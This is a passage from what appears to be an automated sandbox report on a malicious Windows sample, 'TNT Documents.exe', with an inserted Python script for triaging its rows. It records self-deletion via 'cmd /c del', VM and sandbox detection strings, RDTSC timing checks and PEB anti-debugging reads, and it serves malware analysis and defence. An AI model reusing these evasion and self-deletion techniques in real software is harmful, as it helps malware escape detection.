          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 17_2_0331C38A pushfd ; ret
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 17_2_0331825A push ecx; retf
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 17_2_0332B832 push eax; ret
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 17_2_0332B83B push eax; ret
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 17_2_0332B89C push eax; ret
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 17_2_0332B7E5 push eax; ret
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 17_2_03325CC4 push FFFFFFDFh; iretd
          Source: TNT Documents.exe | Static PE information: 0xA539E86C [Sat Nov 3 17:54:52 2057 UTC]
          Source: initial sample | Static PE information: section name: .text entropy: 7.56105630003

          Hooking and other Techniques for Hiding and Protection:

          Self deletion via cmd delete
          Source: C:\Windows\SysWOW64\mstsc.exe | Process created: /c del "C:\Users\user\Desktop\TNT Documents.exe"
          Source: C:\Windows\SysWOW64\mstsc.exe | Process created: /c del "C:\Users\user\Desktop\TNT Documents.exe"
          Source: C:\Users\user\Desktop\TNT Documents.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\mstsc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          Yara detected AntiVM3
          Source: Yara match File source: Process Memory Space: TNT Documents.exe PID: 4548, type: MEMORYSTR
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
          Source: TNT Documents.exe, 00000000.00000002.294558244.00000000026EB000.00000004.00000001.sdmp Binary or memory string: WINE_GET_UNIX_FILE_NAME
          Source: TNT Documents.exe, 00000000.00000002.294558244.00000000026EB000.00000004.00000001.sdmp Binary or memory string: SBIEDLL.DLL
          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Users\user\Desktop\TNT Documents.exe RDTSC instruction interceptor: First address: 0000000000408614 second address: 000000000040861A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\TNT Documents.exe RDTSC instruction interceptor: First address: 00000000004089AE second address: 00000000004089B4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\mstsc.exe RDTSC instruction interceptor: First address: 0000000003318614 second address: 000000000331861A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\mstsc.exe RDTSC instruction interceptor: First address: 00000000033189AE second address: 00000000033189B4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\TNT Documents.exe TID: 5188 Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\explorer.exe Last function: Thread delayed
          Source: C:\Windows\SysWOW64\mstsc.exe Last function: Thread delayed
          Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_004088E0 rdtsc
          Source: C:\Users\user\Desktop\TNT Documents.exe Thread delayed: delay time: 922337203685477
          Source: C:\Users\user\Desktop\TNT Documents.exe Process information queried: ProcessInformation
          Source: C:\Users\user\Desktop\TNT Documents.exe Thread delayed: delay time: 922337203685477
          Source: explorer.exe, 0000000B.00000000.305896440.0000000008A32000.00000004.00000001.sdmp Binary or memory string: VMware SATA CD00dRom0
          Source: explorer.exe, 0000000B.00000000.305896440.0000000008A32000.00000004.00000001.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 0000000B.00000000.309276039.000000000ED78000.00000004.00000001.sdmp Binary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: TNT Documents.exe, 00000000.00000002.294558244.00000000026EB000.00000004.00000001.sdmp Binary or memory string: VMware SVGA IIOData Source=localhost\sqlexpress;Initial Catalog=dbSMS;Integrated Security=True
          Source: explorer.exe, 0000000B.00000000.306183659.0000000008B88000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: TNT Documents.exe, 00000000.00000002.294558244.00000000026EB000.00000004.00000001.sdmp Binary or memory string: vmware
          Source: explorer.exe, 0000000B.00000000.306183659.0000000008B88000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}e
          Source: TNT Documents.exe, 00000000.00000002.294558244.00000000026EB000.00000004.00000001.sdmp Binary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: TNT Documents.exe, 00000000.00000002.294558244.00000000026EB000.00000004.00000001.sdmp Binary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
          Source: explorer.exe, 0000000B.00000000.298506976.00000000048E0000.00000004.00000001.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 0000000B.00000000.306183659.0000000008B88000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}C
          Source: explorer.exe, 0000000B.00000000.305962402.0000000008ACF000.00000004.00000001.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000Datc
          Source: TNT Documents.exe, 00000000.00000002.294558244.00000000026EB000.00000004.00000001.sdmp Binary or memory string: VMWARE
          Source: explorer.exe, 0000000B.00000000.305962402.0000000008ACF000.00000004.00000001.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
          Source: explorer.exe, 0000000B.00000000.339998059.00000000069DA000.00000004.00000001.sdmp Binary or memory string: VMware SATA CD002
          Source: TNT Documents.exe, 00000000.00000002.294558244.00000000026EB000.00000004.00000001.sdmp Binary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: TNT Documents.exe, 00000000.00000002.294558244.00000000026EB000.00000004.00000001.sdmp Binary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
          Source: TNT Documents.exe, 00000000.00000002.294558244.00000000026EB000.00000004.00000001.sdmp Binary or memory string: VMware SVGA II
          Source: TNT Documents.exe, 00000000.00000002.294558244.00000000026EB000.00000004.00000001.sdmp Binary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
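          The evasion rows above (sandbox and VM artifact strings, the paired rdtsc reads six bytes apart, the maximum-length sleeps) and the long run of fs:[30h] PEB reads that follows are easier to read once parsed. The script below is an added triage example, not part of this Joe Sandbox report or of Joe Sandbox itself: it parses the row shapes seen in this section, classifies each artifact string, pairs up RDTSC checks, flags sleeps that hit the 64-bit ceiling and counts PEB reads per function. The sample rows are constructed to match this section (not a verbatim export), the category labels are mine, and the reading of the sleep figure as 2^63-1 100-ns ticks expressed in milliseconds (which is exactly 922337203685477) is an assumption about the sandbox's unit; the arithmetic itself is exact.

```python
"""Triage helper for the "Malware Analysis System Evasion" rows of a Joe Sandbox
report (added example, not part of the report or of Joe Sandbox).  It parses the
row shapes that appear in this section, classifies VM/sandbox artifact strings,
pairs up RDTSC timing checks, flags maximum-length sleeps and counts PEB
(fs:[30h]) reads per function."""
import re
from collections import Counter

# Constructed sample rows modelled on this section (not a verbatim export).  A
# space separates the Source column from the detail column here; the run-together
# form produced by extraction ("...exeCode function:") is accepted as well.
SAMPLE_ROWS = r"""
Source: TNT Documents.exe, 00000000.00000002.294558244.00000000026EB000.00000004.00000001.sdmp Binary or memory string: SBIEDLL.DLL
Source: TNT Documents.exe, 00000000.00000002.294558244.00000000026EB000.00000004.00000001.sdmp Binary or memory string: WINE_GET_UNIX_FILE_NAME
Source: TNT Documents.exe, 00000000.00000002.294558244.00000000026EB000.00000004.00000001.sdmp Binary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
Source: explorer.exe, 0000000B.00000000.305896440.0000000008A32000.00000004.00000001.sdmp Binary or memory string: VMware SATA CD00dRom0
Source: C:\Users\user\Desktop\TNT Documents.exe RDTSC instruction interceptor: First address: 0000000000408614 second address: 000000000040861A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TNT Documents.exe TID: 5188 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\Desktop\TNT Documents.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01574120 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01574120 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0157B944 mov eax, dword ptr fs:[00000030h]
"""

ARTIFACT_RE = re.compile(
    r"^Source:\s*(?P<proc>[^,]+?),.*?Binary or memory string:\s*(?P<s>.+?)\s*$")
RDTSC_RE = re.compile(
    r"RDTSC instruction interceptor: First address: (?P<a>[0-9A-Fa-f]+) "
    r"second address: (?P<b>[0-9A-Fa-f]+) instructions: (?P<ins>.+?)\s*$")
DELAY_RE = re.compile(r"Thread (?:delayed: delay time|sleep time): (?P<t>-?\d+)")
PEB_RE = re.compile(
    r"Code function: (?P<fn>\S+) mov (?P<reg>e[a-d]x), dword ptr fs:\[00000030h\]")

# Substring -> label, first match wins; labels are this example's own naming.
ARTIFACT_CLASSES = (
    ("sbiedll.dll", "Sandboxie: SbieDll.dll module check"),
    ("wine_get_unix_file_name", "Wine: kernel32 export lookup"),
    ("vmware tools", "VMware Tools: install path / registry key"),
    ("hardware\\devicemap\\scsi", "Registry: SCSI identifier lookup"),
    ("services\\disk\\enum", "Registry: disk enumeration lookup"),
    ("vmware", "VMware: device or vendor string"),
)

# (2**63 - 1) 100-ns ticks expressed in milliseconds: the longest relative
# timeout a 64-bit LARGE_INTEGER can encode.  Assumption: the sandbox reports
# the delay in that unit; the value itself is 922337203685477 either way.
MAX_RELATIVE_WAIT = (2**63 - 1) // 10_000


def classify_artifact(s: str) -> str:
    """Return the first matching artifact class for a memory string."""
    low = s.lower()
    for needle, label in ARTIFACT_CLASSES:
        if needle in low:
            return label
    return "unclassified"


def triage(rows: str) -> dict:
    """Parse report rows into artifacts, rdtsc pairs, ceiling sleeps and PEB reads."""
    result = {
        "artifacts": [],        # (process, string, class)
        "rdtsc_pairs": [],      # (first addr, second addr, byte gap, rdtsc count)
        "max_waits": [],        # delay values that hit the 64-bit ceiling
        "peb_reads": Counter(), # function -> number of fs:[30h] reads
    }
    for raw in rows.splitlines():
        line = raw.strip()
        if not line:
            continue
        m = ARTIFACT_RE.match(line)
        if m:
            result["artifacts"].append(
                (m["proc"].strip(), m["s"], classify_artifact(m["s"])))
            continue
        m = RDTSC_RE.search(line)
        if m:
            first, second = int(m["a"], 16), int(m["b"], 16)
            n_rdtsc = len(re.findall(r"\brdtsc\b", m["ins"]))
            result["rdtsc_pairs"].append((first, second, second - first, n_rdtsc))
            continue
        m = DELAY_RE.search(line)
        if m:
            if abs(int(m["t"])) >= MAX_RELATIVE_WAIT:
                result["max_waits"].append(int(m["t"]))
            continue
        m = PEB_RE.search(line)
        if m:
            result["peb_reads"][m["fn"]] += 1
    return result


def summary_lines(report: dict) -> list:
    """Render the triage result as one short line per finding."""
    out = []
    for proc, s, label in report["artifacts"]:
        out.append(f"[artifact] {label:42s} {proc}: {s}")
    for first, second, gap, n in report["rdtsc_pairs"]:
        out.append(f"[rdtsc]    {n} rdtsc within {gap} bytes at 0x{first:08x}..0x{second:08x}")
    for t in report["max_waits"]:
        out.append(f"[sleep]    maximum-length relative wait requested ({t})")
    for fn, n in sorted(report["peb_reads"].items(), key=lambda kv: (-kv[1], kv[0])):
        out.append(f"[peb]      {fn}: {n} fs:[30h] reads")
    return out


if __name__ == "__main__":
    print("\n".join(summary_lines(triage(SAMPLE_ROWS))))
```

          Feed it the plain-text export of the whole section instead of SAMPLE_ROWS and the several hundred fs:[30h] rows reduce to a per-function table; functions with many PEB reads are the first candidates for inspection of BeingDebugged, NtGlobalFlag and heap-flag checks, and the two rdtsc reads six bytes apart are the timing probe the sandbox intercepts.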
          Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_004088E0 rdtsc
          Source: C:\Users\user\Desktop\TNT Documents.exe Process token adjusted: Debug (2 identical rows)
          Source: C:\Windows\SysWOW64\mstsc.exe Process token adjusted: Debug
          Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0157B944 mov eax, dword ptr fs:[00000030h] (2 identical rows)
          Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0155B171 mov eax, dword ptr fs:[00000030h] (2 identical rows)
          Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0155C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01559100 mov eax, dword ptr fs:[00000030h] (3 identical rows)
          Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0158513A mov eax, dword ptr fs:[00000030h] (2 identical rows)
          Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01574120 mov eax, dword ptr fs:[00000030h] (4 identical rows)
          Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01574120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0155B1E1 mov eax, dword ptr fs:[00000030h] (3 identical rows)
          Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_015E41E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01582990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0157C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0158A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_015D51BE mov eax, dword ptr fs:[00000030h] (4 identical rows)
          Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_015861A0 mov eax, dword ptr fs:[00000030h] (2 identical rows)
          Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_015D69A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01570050 mov eax, dword ptr fs:[00000030h] (2 identical rows)
          Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01612073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01621074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_015D7016 mov eax, dword ptr fs:[00000030h] (3 identical rows)
          Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0158002D mov eax, dword ptr fs:[00000030h] (5 identical rows)
          Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01624015 mov eax, dword ptr fs:[00000030h] (2 identical rows)
          Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0156B02A mov eax, dword ptr fs:[00000030h] (4 identical rows)
          Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_015EB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_015EB8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_015EB8D0 mov eax, dword ptr fs:[00000030h] (4 identical rows)
          Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_015558EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01559080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_015D3884 mov eax, dword ptr fs:[00000030h] (2 identical rows)
          Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0158F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0158F0BF mov eax, dword ptr fs:[00000030h] (2 identical rows)
          Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_015990AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_015820A0 mov eax, dword ptr fs:[00000030h] (6 identical rows)
          Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0155F358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0155DB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01583B7A mov eax, dword ptr fs:[00000030h] (2 identical rows)
          Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0155DB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01628B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0161131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_015D53CA mov eax, dword ptr fs:[00000030h] (2 identical rows)
          Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_015803E2 mov eax, dword ptr fs:[00000030h] (6 identical rows)
          Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0157DBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01625BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0158B390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01582397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01561B8F mov eax, dword ptr fs:[00000030h] (2 identical rows)
          Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0160D380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0161138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01584BAD mov eax, dword ptr fs:[00000030h] (3 identical rows)
          Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0160B260 mov eax, dword ptr fs:[00000030h] (2 identical rows)
          Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01628A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_015E4257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01559240 mov eax, dword ptr fs:[00000030h] (4 identical rows)
          Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0159927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0161EA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0155AA16 mov eax, dword ptr fs:[00000030h] (2 identical rows)
          Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01555210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01555210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01555210 mov eax, dword ptr fs:[00000030h] (2 identical rows)
          Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01573A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01568A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01594A2C mov eax, dword ptr fs:[00000030h] (2 identical rows)
          Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0161AA16 mov eax, dword ptr fs:[00000030h] (2 identical rows)
          Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01582ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01582AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0158D294 mov eax, dword ptr fs:[00000030h] (2 identical rows)
          Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0156AAB0 mov eax, dword ptr fs:[00000030h] (2 identical rows)
          Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0158FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_015552A5 mov eax, dword ptr fs:[00000030h] (5 identical rows)
          Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01577D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01593D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_015D3540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0157C577 mov eax, dword ptr fs:[00000030h] (2 identical rows)
          Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01628D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0161E539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01563D34 mov eax, dword ptr fs:[00000030h] (13 identical rows)
          Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01584D3B mov eax, dword ptr fs:[00000030h] (3 identical rows)
          Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0155AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_015DA537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0161FDE2 mov eax, dword ptr fs:[00000030h] (4 identical rows)
          Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01608DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_015D6DC9 mov eax, dword ptr fs:[00000030h] (3 identical rows)
          Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_015D6DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_015D6DC9 mov eax, dword ptr fs:[00000030h] (2 identical rows)
          Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0156D5E0 mov eax, dword ptr fs:[00000030h] (2 identical rows)
          Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0158FD9B mov eax, dword ptr fs:[00000030h] (2 identical rows)
          Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_016205AC mov eax, dword ptr fs:[00000030h] (2 identical rows)
          Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01582581 mov eax, dword ptr fs:[00000030h] (4 identical rows)
          Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01552D8A mov eax, dword ptr fs:[00000030h] (5 identical rows)
          Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01581DB5 mov eax, dword ptr fs:[00000030h] (3 identical rows)
          Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_015835A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_015EC450 mov eax, dword ptr fs:[00000030h] (2 identical rows)
          Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0158A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0157746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_015D6C0A mov eax, dword ptr fs:[00000030h] (4 identical rows)
          Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01611C06 mov eax, dword ptr fs:[00000030h] (14 identical rows)
          Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0162740D mov eax, dword ptr fs:[00000030h] (3 identical rows)
          Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0158BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_016114FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_015D6CF0 mov eax, dword ptr fs:[00000030h] (3 identical rows)
          Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01628CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0156849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01628F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0156EF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0156FF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0157F716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_015EFF10 mov eax, dword ptr fs:[00000030h] (2 identical rows)
          Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0158A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0158A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0158E730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0162070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0162070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01554F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01554F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_015937F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01568794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_015D7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_015D7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_015D7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01567E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01567E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01567E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01567E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01567E41 mov eax, dword ptr fs:[00000030h]
